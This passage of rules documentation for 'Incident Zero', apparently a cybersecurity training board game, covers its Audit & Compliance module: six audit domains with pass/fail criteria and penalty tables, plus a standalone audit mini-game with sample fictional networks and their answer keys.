║ → AUDIT: "Endpoint protection review"                          ║
╚════════════════════════════════════════════════════════════════╝

FIND-04: Investigative Gaps & Recommendations

╔════════════════════════════════════════════════════════════════╗
║              FIND-04: INVESTIGATIVE GAPS & RECOMMENDATIONS     ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Investigation completes (Victory or Failure)   ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Key Questions Answered:                                        ║
║ - [ ] Attack entry point identified?                           ║
║ - [ ] Attacker motivation understood?                          ║
║ - [ ] Threat actor identified (attribution)?                   ║
║ - [ ] Data compromised: volume and sensitivity?                ║
║ - [ ] Current access status: eliminated or ongoing?            ║
║ - [ ] Persistence mechanisms: removed or active?               ║
║                                                                 ║
║ Remaining Questions:                                           ║
║ - [List specific unknowns from the investigation]              ║
║ - [What evidence gaps prevent complete understanding]          ║
║ - [What would close these gaps (more investigation, experts)]  ║
║                                                                 ║
║ NEXT STEPS:                                                    ║
║ 1. [If gaps remain: External forensics firm for deep analysis] ║
║ 2. [Law enforcement involvement for attribution/prosecution]   ║
║ 3. [Threat intelligence: share findings with industry]         ║
║ 4. [Lessons learned: update hardening/network architecture]    ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → AUDIT & COMPLIANCE: "Post-incident review and control updates"║
║ → TRAINING: "Lessons learned session with all teams"           ║
║ → STRATEGIC: "Investment in detection/response capabilities"   ║
╚════════════════════════════════════════════════════════════════╝

Evidence Card Combinations

Fast Track (Quick Investigation - 4 Turns, respecting Durations)

Result: Quick understanding of attack progression without full attribution


Complete Investigation (5-6 Turns)

Result: Complete attack narrative with attribution


Advanced Investigation (7+ Turns)

Result: Expert-level forensic analysis, actionable threat intelligence


FAQ

Q: Can I discover the same Evidence card twice? A: No. Each Evidence card represents a unique finding. Multiple investigations may point to the same finding (confirming it), but you only gain progress once.

Q: What if I fail an investigation? A: No Evidence is discovered, but you've used a turn and Budget. You can retry next turn (costs the full Budget again) or move to a different investigation.

Q: How do I use Evidence Cards to support my narrative? A: Reference specific Evidence cards when describing findings to Threat Orchestrator or in debrief. Chain of Custody rating shows admissibility in court.


Version History

docs/rules/module-audit-compliance.md

Audit & Compliance Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025

v2.2: this document's modifier table is canonical — the tables in cards/audit-compliance/ are generated from it. See v2.2 Playtest Edition Changes at the bottom.


Module Overview

The Audit & Compliance Module teaches players how security assessments reveal vulnerabilities that attackers will eventually exploit. Teams conduct a simulated third-party audit of their IT infrastructure, discovering gaps that will matter later.

Key Concept: "Auditors find what attackers will exploit." The findings from this module either inform hardening decisions (if successful) or create additional costs (if incident occurs).

Module Teaches: - Primary: Security assessment, compliance frameworks (NIST, CIS, PCI-DSS), vulnerability discovery - Secondary: Risk prioritization, remediation planning, audit-to-action translation

Integration Point: - Can be played standalone (teams audit a pre-built network) - OR as setup for Incident Response/Disaster Recovery (audit findings modify those modules) - See module-combinations.md for recommended sequences


Module Setup (10 minutes)

1. Choose Assessment Framework

| Framework | Focus | Best For |
|---|---|---|
| NIST Cybersecurity Framework | 5 Core Functions (CSF 1.1; CSF 2.0 adds Govern for 6) | General organizations |
| CIS Critical Controls | 18 Controls (CIS v8) | Defense-focused |
| PCI-DSS | Payment card security | Retail/e-commerce |
| HIPAA | Healthcare data | Healthcare organizations |
| Multi-Framework | Mix of above | Realistic compliance |

Key Point: Framework choice determines which audit domains are tested.

Budget note (v2.2): core-rules gives the Audit module a starting Budget of 100. That Budget applies only when playing the optional Remediation follow-up cards (see cards/audit-compliance/expansion-deck/compliance-frameworks.md, remediation section); the assessment itself costs nothing.

2. Choose Assessment Scope

| Scope | Time | Networks Evaluated |
|---|---|---|
| Basic | 5 min | One pre-built network |
| Standard | 10 min | One network from Network Building OR pre-built |
| Comprehensive | 15+ min | Multiple networks / multiple locations |

3. Network Input

Option A: Use Pre-Built Network - Threat Orchestrator provides a sample network - Teams audit it without having built it - Focuses on audit skills, not network design

Option B: Use Network from Network Building Module - Teams audit the network they just built - Directly see consequences of earlier decisions - More integrated experience

Option C: Create Fictional Network via Narrative - Threat Orchestrator describes a scenario: "Your organization has email, web, database, and domain controller servers. Some are on-prem, some in cloud. You have a firewall but no IDS." - Teams audit based on description - Faster, requires less setup


Gameplay Loop (10 minutes)

Audit Structure

Threat Orchestrator (Acting as External Auditor) reviews the network and assesses 6 audit domains:

Domain 1: Network Segmentation & Isolation

Audit Question: "Does your network properly isolate critical systems from untrusted networks?"

Pass Criteria (all required):
- Segmented architecture (3+ zones)
- Firewall deployed between zones
- Critical systems (Database, Domain Controller) in a separate zone from internet-facing systems

Fail Criteria (any one):
- Flat network (no segmentation)
- Segmentation without a firewall
- Critical systems in the same zone as untrusted systems

If FAIL - Finding:
- Name: Network Segmentation Gap
- Risk Level: CRITICAL
- Consequence in IR: Lateral movement easier (-1 to defending against NETWORK attacks)
- Consequence in DR: Attacker access spreads to more systems (-10 DR budget penalty)

Narrative for Teams: "All of your systems are on the same network segment. Once an attacker gains access to one system, they can move freely between others."


Domain 2: Access Control & Identity Management

Audit Question: "Is your identity system (directory services, authentication, authorization) properly secured?"

Pass Criteria (all required):
- Domain Controller deployed
- Domain Controller on a separate network segment
- Domain Controller not overloaded (≤2 services)

Fail Criteria (any one):
- No Domain Controller deployed
- Domain Controller on the same segment as untrusted systems
- Domain Controller overloaded (3+ services)

If FAIL - Finding:
- Name: Identity System Vulnerability
- Risk Level: CRITICAL
- Consequence in IR: Credential-based attacks easier (-1 to defending against CREDENTIAL_ABUSE attacks)
- Consequence in DR: Full credential compromise; all user accounts compromised (-15 DR budget penalty)

Narrative for Teams: "Your identity system is overloaded with too many services and insufficient hardening. If compromised, attackers will have broad access to all user credentials."


Domain 3: Threat Detection & Incident Response

Audit Question: "Can you detect attacks when they happen? Do you have monitoring and alerting?"

Pass Criteria (any one is enough):
- IDS or IPS deployed
- SIEM system deployed
- Email Gateway + Honeypot deployed (detection alternative)

Fail Criteria (any one):
- None of the above detection systems deployed
- Only basic security devices with no central logging

If FAIL - Finding:
- Name: Detection & Monitoring Gap
- Risk Level: HIGH
- Consequence in IR: Investigations slower (-1 to Investigation rolls; 12+ instead of 11+)
- Consequence in DR: Breach undetected longer; more data stolen (-10 DR budget penalty)

Narrative for Teams: "You have no centralized logging or monitoring. When an attack happens, you won't know about it until data is already compromised."


Domain 4: Backup & Disaster Recovery

Audit Question: "Do you have functional backups? Can you recover from data loss or ransomware?"

Pass Criteria (Backup System deployed, AND at least one of the following):
- Backup isolated on a separate network (not reachable with production credentials)
- Cloud backup configured
- Multiple hosting locations (on-prem + cloud redundancy)

Fail Criteria (any one):
- No Backup System deployed
- Single point of failure (backups on the same site or provider as production: all on-prem or all cloud)

If FAIL - Finding:
- Name: Backup & Recovery Gap
- Risk Level: CRITICAL (affects ransomware recovery / DR only)
- Consequence in IR: None (recovery gap, not a detection issue)
- Consequence in DR: Ransomware unrecoverable; full rebuild required (-25 DR budget penalty)

Narrative for Teams: "You have no backup strategy. If ransomware hits, you cannot recover your data. You must either pay ransom or rebuild from scratch."


Domain 5: Third-Party Risk & Cloud Security

Audit Question: "Are your cloud systems and third-party integrations properly secured and isolated?"

Pass Criteria (all required):
- Cloud systems isolated on a private network (VPN or private link, not public IPs)
- Cloud systems monitored/managed
- Credentials for cloud access securely managed

Fail Criteria (any one):
- Cloud systems internet-exposed
- No monitoring of cloud services
- Long-lived cloud credentials stored on local systems or in code

If FAIL - Finding:
- Name: Cloud Security Gap
- Risk Level: HIGH
- Consequence in IR: Cloud-based attacks easier (-1 to defending against WEB_EXPLOIT attacks)
- Consequence in DR: Cloud compromise requires cloud provider recovery; slow remediation (-20 DR budget penalty)

Narrative for Teams: "Your cloud systems are internet-accessible without protection. Any attacker can directly target your cloud infrastructure."


Domain 6: Security Operations & Monitoring

Audit Question: "Do you have centralized logging, monitoring, and security operations capability?"

Pass Criteria (either one):
- SIEM system deployed
- Email Gateway + IDS deployed (combined monitoring)

Fail Criteria:
- No SIEM or equivalent centralized logging

If FAIL - Finding:
- Name: Security Operations Gap
- Risk Level: MEDIUM
- Consequence in IR: Investigations slower (-1 to Investigation rolls)
- Consequence in DR: Forensic analysis slow; can't determine breach scope (-5 DR budget penalty)

Narrative for Teams: "You have no centralized place to view security events. When an attack happens, investigators must pull data from multiple sources manually."


Audit Report Generation

Creating the Formal Findings Report

After all 6 domains are assessed, Threat Orchestrator produces an Audit Findings Report:

SECURITY AUDIT FINDINGS REPORT

Organization: [Name]
Assessment Date: [Date]
Framework: [Framework used]
Auditor: [Your name / External firm]

═══════════════════════════════════════════

DOMAIN ASSESSMENT SUMMARY:

✓ PASS - Network Segmentation & Isolation
  Observation: Network properly segmented with firewalls between zones.
  Assessment: Risk is LOW for lateral movement.

✗ FAIL - Access Control & Identity Management
  Finding: Domain Controller overloaded with excessive services.
  Risk: If DC compromised, entire identity system at risk.
  Severity: CRITICAL
  Recommendation: Isolate DC to minimal required services.

✓ PASS - Threat Detection & Incident Response
  Observation: IDS deployed; no SIEM or Email Gateway.
  Assessment: Adequate detection capability (alerts exist, but no central correlation).

✗ FAIL - Backup & Disaster Recovery
  Finding: No backup system deployed.
  Risk: Data loss unrecoverable; ransomware response limited to ransom/rebuild.
  Severity: CRITICAL
  Recommendation: Deploy backup system immediately.

✓ PASS - Third-Party Risk & Cloud Security
  Observation: Cloud systems properly isolated on private network.
  Assessment: Cloud security posture adequate.

✗ FAIL - Security Operations & Monitoring
  Finding: No SIEM; IDS alone (without Email Gateway) does not meet the combined-monitoring alternative.
  Risk: Incident investigation will be slow and manual.
  Severity: MEDIUM
  Recommendation: Deploy SIEM or equivalent centralized logging.

═══════════════════════════════════════════

FINAL SCORE: 3/6 DOMAINS PASS

Overall Assessment: CONCERNING GAPS IDENTIFIED

Summary: Organization has adequate network and cloud security but lacks:
1. Proper identity system isolation
2. Backup/recovery capability
3. Centralized monitoring

Impact Estimate:
- If attack occurs: Investigation slow and manual; recovery impossible without ransom
- Estimated cost to remediate findings: ~$40K (modest investment)
- Estimated cost of breach due to these gaps: ~$500K+ (significant exposure)

Recommendation Priority:
1. Deploy backup system (prevent ransomware catastrophe)
2. Isolate Domain Controller (prevent credential compromise)
3. Centralize logging (speed up incident response)

Audit Scoring

One Rubric (v2.2): PASS/FAIL is primary

PASS/FAIL per domain (X/6) is the primary score. Star ratings (1-5★) are flavor for narrative reports, with this fixed mapping:

1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL

Optional (v2.2): a 5★ (exemplary) rating in Detection grants +1 to Incident Response investigation rolls if IR is played later.

Final Audit Score

Teams receive a score reflecting their infrastructure quality:

| Score | Assessment | Interpretation |
|---|---|---|
| 6/6 PASS | Enterprise-Grade | No modifiers carried into later modules; strong foundation |
| 5/6 PASS | Strong Security | One gap: at most one -1 IR modifier (none if the gap is Backup) |
| 4/6 PASS | Adequate Security | Two gaps: up to two -1 IR modifiers |
| 3/6 PASS | Concerning Gaps | Three gaps: up to three -1 IR modifiers; IR noticeably harder for defenders |
| Below 3/6 | High Risk | Four or more gaps: stacked -1 modifiers make IR much harder; the DR budget penalty always reaches the -30 cap |

Narrative Interpretation

6/6 Pass: "Your organization demonstrates strong security practices across all domains. While no system is perfect, you have implemented key controls and best practices."

4-5/6 Pass: "Your organization has good foundational security but should prioritize remediation of identified gaps. Most critical systems are protected, but some exposure remains."

3/6 Pass: "Your organization has significant security gaps that create real risk. Multiple critical domains require attention. If an incident occurs, you will face challenges."

Below 3/6: "Your organization has critical gaps across multiple domains. Significant investment needed to meet baseline security standards."


Audit Findings as Attack Modifiers

How Audit Failures Affect Other Modules

When audit findings exist and other modules are played:

In Incident Response Module:

Each FAIL finding creates a -1 modifier (one per gap — canonical, v2.2) to the relevant roll:

| Audit Finding | IR Modifier | Effect |
|---|---|---|
| Segmentation Gap | -1 to NETWORK defenses | Lateral movement attacks easier |
| Identity Gap | -1 to CREDENTIAL_ABUSE defenses | Credential attacks easier |
| Detection Gap | -1 to Investigation rolls | Finding threats takes longer (11+ becomes 12+) |
| Backup Gap | No IR effect | Matters in Disaster Recovery |
| Cloud Gap | -1 to WEB_EXPLOIT defenses | Web/API attacks easier |
| Operations Gap | -1 to Investigation rolls | Forensic investigation slower |

Example: Segmentation Gap Active in IR

INCIDENT RESPONSE PHASE:

Team's Threat: Lateral Movement via SMB
Base roll needed: 11+
Audit Modifier: -1 (Segmentation Gap)
Effective roll needed: 12+

Team's Defense: Network Segmentation (newly deployed)
Roll: 14 + 2 (justification) = 16
Result: SUCCESS (16 ≥ 12)

TO Narrative: "Your network segmentation worked perfectly, stopping the
lateral movement that would have been trivial in an unsegmented network."

In Disaster Recovery Module:

Each FAIL finding is a penalty subtracted from the DR starting budget (this table is canonical — v2.2):

| Audit Finding | DR Budget Penalty | Why |
|---|---|---|
| Segmentation Gap | -10 Budget | attacker spreads to more systems |
| Identity Gap | -15 Budget | full credential compromise |
| Detection Gap | -10 Budget | dwell time longer; more data stolen |
| Backup Gap | -25 Budget | no recovery option; expensive rebuild |
| Cloud Gap | -20 Budget | cloud provider recovery needed |
| Operations Gap | -5 Budget | forensic investigation slow |

Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.

Example: Multiple Gaps in DR (v2.2)

DISASTER RECOVERY PHASE:

Teams start with 50 crisis budget (DR 50; for reference, IR starts at 100).

Audit Failures from earlier assessment:
- Segmentation Gap: -10
- Detection Gap: -10
- Backup Gap: -25

Raw Gap Penalty: -45 -> capped at -30

Available Crisis Budget: 50 - 30 = 20

With 20 Budget the team cannot afford the cheapest mandatory path
(29): they must lean on the free Holding Statement and skip
actions, so the response will be thin. Outcome: heavy pressure,
likely reputation damage.

Integration with Other Modules

Audit as Setup for Incident Response

Recommended Flow: Audit → Incident Response

  1. Conduct Audit (10 minutes)
     - Identify 3-5 gaps in the network
  2. Generate Modifiers (2 minutes)
     - Each gap becomes a -1 modifier to the relevant roll in IR
  3. Play Incident Response (35-40 minutes)
     - Teams discover that audit findings predicted attack vectors
     - Audit gaps make IR harder
     - Teams gain appreciation for audit value
  4. Debrief (10 minutes)
     - Discuss how audit findings manifested as attack vectors
     - Real-world connection to breach investigations

Audit as Setup for Disaster Recovery

Recommended Flow: Audit → [Incident Response] → Disaster Recovery

  1. Conduct Audit (10 minutes)
     - Identify gaps (particularly Backup Gap and Detection Gap)
  2. Skip or Lose IR (optional)
     - Assume attackers breached and the incident was NOT detected
  3. Play Disaster Recovery (30-35 minutes)
     - Each audit gap increases crisis costs
     - Teams discover backup gap = ransomware unrecoverable
     - Teams discover detection gap = dwell time was 48+ hours
  4. Debrief (10 minutes)
     - Discuss financial impact of audit failures
     - Calculate total incident cost

Audit as Learning Tool (Standalone)

Play Just the Audit Module (as independent learning)


Tips for Threat Orchestrators

Before the Audit

  1. Choose framework - NIST/CIS/PCI-DSS based on organization/industry
  2. Select network - Pre-built OR from Network Building OR fictional
  3. Prepare assessment checklist - Know pass/fail criteria for each domain
  4. Have findings report template - For consistent, professional output

During the Audit

  1. Walk through systematically - Each domain, one at a time
  2. Explain reasoning - "You passed segmentation because you have firewalls between zones"
  3. Use NIST/CIS language - Frame findings in recognized compliance framework
  4. Be fair - Audit findings should be accurate, not arbitrary
  5. Take notes - Document what you see for the formal report

After the Audit

  1. Create findings report - Professional document teams can reference
  2. Calculate score - X/6 domains pass
  3. Identify modifiers - Which audit gaps will affect Incident Response
  4. Estimate remediation costs - Budget and timeline to fix findings
  5. Explain real-world connections - Compare audit process to actual assessments (SOC 2, ISO 27001, etc.)

Sample Scenarios

Scenario 1: "Startup Audit" (Beginner)

Network Characteristics: - Flat network (no segmentation) - Email, web, database on same servers (overloaded) - No backup system - No SIEM or monitoring - All on-premises

Expected Audit Result: - 1-2/6 domains pass - Multiple CRITICAL findings - High remediation cost - Team learns value of basics (backup, monitoring)


Scenario 2: "Mid-Market Audit" (Intermediate)

Network Characteristics: - Segmented network with firewall - Dedicated servers for critical functions - Backup system present - IDS deployed but no SIEM - Hybrid on-prem/cloud

Expected Audit Result: - 4/6 domains pass - 2 findings: Security Operations Gap (MEDIUM; IDS without SIEM or Email Gateway) and Cloud Security Gap (HIGH; hybrid cloud not fully isolated) - Moderate remediation cost - Team learns importance of comprehensive monitoring


Scenario 3: "Enterprise Audit" (Advanced)

Network Characteristics: - Fully isolated network architecture - Dedicated hardened servers - Comprehensive backup strategy - SIEM + IDS deployed - Cloud properly secured

Expected Audit Result: - 5-6/6 domains pass - 0-1 minor findings - Low remediation cost - Team learns value of comprehensive program


Extensions & Variations

Variation 1: Regulatory Compliance Specific

Focus audit on specific compliance requirement: - PCI-DSS: Focus on payment card handling, encryption, access control - HIPAA: Focus on healthcare data protection, audit logs, access management - SOC 2: Focus on security, availability, confidentiality controls - GDPR: Focus on data protection, breach notification, privacy

Each framework has different pass/fail criteria.


Variation 2: Continuous Auditing

Run audit multiple times with team improvements: 1. Initial audit (baseline) 2. Team makes improvements based on findings 3. Follow-up audit (measure improvement) 4. Calculate improvement % and cost-benefit


Variation 3: Threat Model Audit

Instead of compliance framework, audit against specific threat profile: - "This organization faces nation-state threat" → Audit for advanced detection - "This organization handles PHI data" → Audit for healthcare security - "This organization processes credit cards" → Audit for PCI-DSS - "This organization is critical infrastructure" → Audit for resilience


Quick Reference: Audit Domains & Consequences (canonical, v2.2)

| Domain | PASS Meaning | FAIL Consequence (IR) | FAIL Consequence (DR) |
|---|---|---|---|
| Segmentation | Good isolation | -1 to NETWORK defense | -10 budget |
| Identity | Proper AC | -1 to CREDENTIAL_ABUSE defense | -15 budget |
| Detection | Good monitoring | -1 to Investigation | -10 budget |
| Backup | Recovery capable | None | -25 budget |
| Cloud | Secure cloud | -1 to WEB_EXPLOIT defense | -20 budget |
| Operations | Good logging | -1 to Investigation | -5 budget |

Cap (v2.2): total DR budget penalty capped at -30. Star flavor mapping: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL.


Need Help?


v2.2 Playtest Edition Changes

  1. One canonical modifier table. This document's table is authoritative: DR budget penalties Segmentation -10 / Identity -15 / Detection -10 / Backup -25 / Cloud -20 / Ops -5, and one -1 IR modifier per gap. The tables in cards/audit-compliance/core-deck/audit-domain-cards.md and cards/audit-compliance/README.md are regenerated from it. One-off mechanics that existed nowhere else ("+5 turn penalty", "+1 escalation point", "-2 modifier", "+1 difficulty") are deleted or folded into the canonical -1-per-gap rule.
  2. Cap added: the total gap penalty applied to a subsequent module's budget is capped at -30. The unexplained "from 120 to 190" example was replaced with real budgets (DR 50, IR 100).
  3. One scoring rubric: PASS/FAIL per domain (X/6) is primary. Stars are flavor with a fixed mapping — 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL — printed here, on the domain cards, and in the standalone guide. Optional: 5★ in Detection grants +1 to IR investigation rolls if IR is played later.
  4. Budget note: the module's core-rules Budget (100) applies only to the optional Remediation follow-up cards; the assessment itself costs nothing.
  5. Fact corrections: CIS "20 Core Controls" → 18 (CIS v8) everywhere; NIST CSF category codes corrected in the expansion deck (Protect = PR.AC/PR.AT/PR.DS/PR.IP/PR.MA/PR.PT; Respond = RS.RP/RS.CO/RS.AN/RS.MI/RS.IM); segmentation cites PR.AC-5; vendor risk cites ID.SC; incident response is CIS Control 17 (v8).
  6. Card counts corrected: expansion deck is 19 cards (11 framework + 8 remediation); CIS section is 3 cards; HIPAA/SOC 2 moved to "Planned".
  7. Play aids: scoring reference card, audit worksheet, and judge guide are moving to the print pack (coming); an inline text audit worksheet is included in the standalone guide so it is playable today.

Audit & Compliance Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/audit-compliance.md

Incident Zero: Compliance Audit Standalone Mini-Games

Three Variations of Security Assessment Gameplay

Version: 2.2 - Playtest Edition — answer keys now follow the printed criteria; PASS/FAIL (X/6) is the primary score (stars: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL). See docs/rules/module-audit-compliance.md for the canonical modifier table.


Overview

Compliance Audit Standalone offers three distinct game modes that can be played independently:

  1. Variation A: Pre-Built Networks (15-25 minutes) - Audit existing networks
  2. Variation B: Random Network Generation (25-35 minutes) - Generate network, then audit
  3. Variation C: Audit the Auditor Debate (20-30 minutes) - Interactive audit challenge

Common Theme: Teams understand how audits find vulnerabilities that attackers will exploit.

Best For: - Standalone 20-35 minute sessions - Teaching audit frameworks - Understanding security gaps - Before/after comparison with the Incident Response module - Competitive assessment skills


VARIATION A: PRE-BUILT NETWORKS

"Audit the Sample Networks"

Duration: 15-25 minutes
Players: 1-4 teams
Difficulty: Easy (low cognitive load)
Best For: Quick session, first-time audit introduction


Concept

"Three organizations have submitted their infrastructure for audit. Review each one and score their security posture. Which has the best design? Which is most vulnerable?"

Teams receive 3 pre-built network descriptions and audit them against a 6-domain framework. Compare results and discuss why vulnerabilities matter.


Game Materials

Pre-Built Sample Networks (3 total)

SAMPLE NETWORK 1: "StartUp Tech"

INFRASTRUCTURE DESCRIPTION:

Startup Tech is a 50-person web development company.
Cloud-first approach, minimal on-premises systems.

DEPLOYMENT:
- Web Server (Cloud - AWS): Hosts company website and app portal
- Database Server (Cloud - AWS RDS): Customer data, 100K records
- Development Server (Cloud - AWS EC2): Dev/test environment
- Domain Controller (On-Prem): AD for user identity (1 small server)
- File Server (On-Prem): Shared documents
- Email Server (Cloud - Microsoft 365): Email via SaaS provider

SECURITY DEVICES:
- Email Gateway: None (using Microsoft 365 default)
- Firewall: AWS Security Groups (cloud provider native)
- IDS/IPS: None
- SIEM: None
- WAF: None
- Backup: AWS automated snapshots + Microsoft 365 retention
- VPN: None (all cloud-native, no remote access needed)

NETWORK ARCHITECTURE:
- Hybrid (50% Cloud, 50% On-Prem)
- Cloud systems accessible via internet (all public IP)
- On-prem systems on isolated LAN
- No network segmentation between cloud and on-prem

HOSTING:
- 50% AWS (web, database, dev)
- 50% On-Premises (AD, file sharing)

SECURITY POSTURE:
- No perimeter firewall monitoring
- Cloud infrastructure: AWS default security (basic)
- On-prem infrastructure: Minimal controls
- Identity: Single AD instance (critical point)
- No incident detection
- Backups functional but not tested

SAMPLE NETWORK 2: "Mid-Market Corp"

INFRASTRUCTURE DESCRIPTION:

Mid-Market Corp is a 200-person financial services company.
Balanced on-premises and cloud, mature IT operations.

DEPLOYMENT:
- Email Server (On-Prem): Exchange 2019
- Web Server (Cloud - Azure): Public website + customer portal
- Database Server (On-Prem): SQL Server, customer data, 1M records
- File Server (On-Prem): Network file shares, active collaboration
- Domain Controller (On-Prem): AD + LDAP, 200 users
- Development Server (Cloud - Azure): Dev/test
- Backup System (On-Prem): Backup appliance, off-site replication
- Legacy System (On-Prem): 15-year-old accounting system

SECURITY DEVICES:
- Firewall: Cisco ASA (perimeter) + internal segmentation firewall
- Email Gateway: Proofpoint (phishing/malware filter)
- IDS: Suricata (network-based detection)
- IPS: None (IDS only)
- SIEM: Splunk (centralized logging)
- WAF: AWS WAF (in front of web server)
- VPN: Cisco AnyConnect (remote access)
- Honeypot: None

NETWORK ARCHITECTURE:
- Segmented (3 zones: DMZ, Internal, Finance)
- Firewalls enforce zone boundaries
- On-prem systems segregated from cloud
- Cloud systems on private network (not public internet)

HOSTING:
- 40% On-Premises (core business systems)
- 60% Cloud (web, dev, supplementary)

SECURITY POSTURE:
- Perimeter monitoring active (IDS)
- Email filtering active
- Centralized logging (SIEM)
- Remote access controlled (VPN)
- Backup and recovery tested
- Legacy system isolated but unpatched

SAMPLE NETWORK 3: "Enterprise Bank"

INFRASTRUCTURE DESCRIPTION:

Enterprise Bank is a 1000+ person financial institution.
Highly regulated (PCI-DSS, HIPAA), on-premises focused.

DEPLOYMENT:
- Email Server (On-Prem): Custom hardened system + redundancy
- Web Server (Cloud/Hybrid): DMZ layer for customer portal
- Database Server (On-Prem): Oracle RAC, 500M+ records, air-gapped
- File Server (On-Prem): Multiple redundant file servers by department
- Domain Controller (On-Prem): Multiple DCs, LDAP + Kerberos, hardened
- Development Server (On-Prem): Isolated dev network, no access to prod
- Backup System (On-Prem): Multiple backup systems, offline vault, geographically distant
- Cloud Workload (Limited): Only non-sensitive workloads

SECURITY DEVICES:
- Firewall: Multiple Palo Alto networks (perimeter + internal + cloud boundary)
- Email Gateway: Proofpoint + internal inspection
- IDS: Multiple IDS systems (network + host-based)
- IPS: Palo Alto IPS (active blocking)
- SIEM: Splunk + IBM QRadar (redundant)
- WAF: F5 WAF (multi-layer)
- VPN: Multiple VPN concentrators, MFA required
- Honeypot: Internal honeypot network (3 decoy systems)
- Network Segmentation: Microsegmentation between critical systems
- Intrusion Prevention: Advanced threat prevention

NETWORK ARCHITECTURE:
- Fully Isolated (10+ security zones)
- Each zone has firewall enforcement
- Zero-trust network access
- Air-gapped critical systems
- Private clouds only (no public internet access)

HOSTING:
- 95% On-Premises (regulatory requirement)
- 5% Cloud (non-critical, isolated)

SECURITY POSTURE:
- Comprehensive logging (multiple SIEM)
- Advanced threat detection (IDS/IPS + honeypot)
- Incident response ready
- Backup and recovery tested quarterly
- All systems hardened per NIST guidelines
- Compliance audited annually (PCI-DSS, SOX)

Audit Assessment Framework

The 6-Domain Audit

Teams assess each network using this framework. Scoring (v2.2): PASS/FAIL per domain (X/6) is the primary score. If you use star ratings for flavor, the fixed mapping is 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL.

Domain 1: Network Segmentation

Question: "Are critical systems isolated?"

Score   Criteria
PASS    Firewall between zones OR microsegmentation active
FAIL    Flat network OR segmentation without enforcement

Domain 2: Access Control & Identity

Question: "Is identity management secure?"

Score   Criteria
PASS    Dedicated Domain Controller, MFA for remote access, minimal over-privilege
FAIL    No DC OR DC overloaded OR no MFA OR broad admin access

Domain 3: Incident Detection & Response

Question: "Can you detect attacks?"

Score   Criteria
PASS    IDS/IPS or SIEM deployed, covering all critical segments
FAIL    No IDS/IPS and no SIEM, OR a critical segment sits outside detection coverage

Domain 4: Backup & Disaster Recovery

Question: "Can you recover from failure?"

Score   Criteria
PASS    Backup system deployed + tested + geographically diverse
FAIL    No backup OR untested backup OR single location

Domain 5: Third-Party Risk Management

Question: "Are cloud/vendor systems managed?"

Score   Criteria
PASS    Cloud systems isolated OR not handling critical data
FAIL    Cloud systems on internet + handling sensitive data + no WAF

Domain 6: Security Operations & Monitoring

Question: "Do you have centralized visibility?"

Score   Criteria
PASS    SIEM deployed + centralized logging active
FAIL    No SIEM OR no centralized logging

Audit Worksheet (inline version — copy onto paper; printed sheet: see print pack, coming)

AUDIT WORKSHEET
Organization audited: ______________________   Auditing team: ______________________

Domain                              PASS/FAIL   Key finding (one line)
1. Network Segmentation             [    ]      ______________________________________
2. Access Control & Identity        [    ]      ______________________________________
3. Incident Detection & Response    [    ]      ______________________________________
4. Backup & Disaster Recovery       [    ]      ______________________________________
5. Third-Party Risk Management      [    ]      ______________________________________
6. Security Ops & Monitoring        [    ]      ______________________________________

SCORE: ____ / 6 PASS      (PARTIAL counts as FAIL; stars: 1-2* = FAIL, 3*+ = PASS)

TOP 3 RECOMMENDATIONS:
1. ___________________________________________________________________________
2. ___________________________________________________________________________
3. ___________________________________________________________________________

Gameplay (20-25 minutes)

Turn Structure

Phase 1: Introduction (2 minutes)

TO explains: "You're security auditors reviewing three organizations' infrastructure designs. For each, you'll score them on a 6-domain framework. Your goal: Identify which has the strongest security posture and which is most vulnerable."

Phase 2: Audit Each Network (5 minutes per network = 15 minutes)

For each network (Startup, Mid-Market, Enterprise):

  1. TO reads network description (2 minutes)
  2. Teams discuss and score (2 minutes)
  3. Vote on PASS/FAIL for each domain
  4. Record scores on the audit worksheet (inline version above; printed version: see print pack, coming)
  5. TO reveals "correct" audit (1 minute)
  6. Teams compare their assessment to expert audit
  7. Discuss differences

Phase 3: Comparative Analysis (5 minutes)

Teams answer:
  1. "Which organization is most secure?"
  2. "Which is most vulnerable to attack?"
  3. "If you HAD to use one network, which would you choose?"


Pre-Built Audit Results

Startup Tech - Audit Results (v2.2 — the answer key now follows its own criteria)

Domain                 Score   Finding
Network Segmentation   FAIL    No firewall between cloud and on-prem; cloud accessible from internet
Access Control         FAIL    Dedicated AD exists, but no MFA anywhere (cloud consoles are remote access) — "no MFA" is a FAIL condition
Detection              FAIL    No IDS/IPS or SIEM
Backup & Recovery      FAIL    AWS snapshots + M365 retention exist but are untested — "untested backup" is a FAIL condition
Third-Party Risk       FAIL    Cloud systems public internet-accessible, holding customer data, no WAF
Operations             FAIL    No centralized monitoring

Score: 0/6 PASS (strict). A lenient auditor might award Access Control a narrow PASS — dedicated, single-purpose DC and no VPN/remote-access paths to on-prem — for 1/6. Either reading lands in the same tier: Below 3/6, HIGH RISK. (The judgment call itself is a great Variation C debate.)

Risk Rating: HIGH / CRITICAL
- Vulnerabilities: No network segmentation, no detection capability, no MFA, untested backups, cloud systems exposed
- Attack Scenario: Attacker compromises cloud web server → lateral movement to on-prem AD → full network access; if ransomware hits, the untested backups may not restore
- Cost of Breach: Very high (no detection, no segmentation to contain, recovery uncertain)


Mid-Market Corp - Audit Results (v2.2 — table and score now agree)

Domain                 Score   Finding
Network Segmentation   PASS    Firewalls between DMZ, Internal, Finance zones
Access Control         PASS    AD hardened, VPN with MFA
Detection              FAIL    IDS + SIEM deployed, but detection-only (no IPS blocking) and the isolated legacy accounting segment sits outside IDS coverage — a blind spot at the highest-risk, unpatched system
Backup & Recovery      PASS    Backup appliance with off-site replication, tested
Third-Party Risk       PASS    Cloud systems on private network, WAF in place
Operations             PASS    SIEM + centralized logging

Score: 5/6 PASS

Risk Rating: MEDIUM
- Strengths: Good segmentation, logging, backups
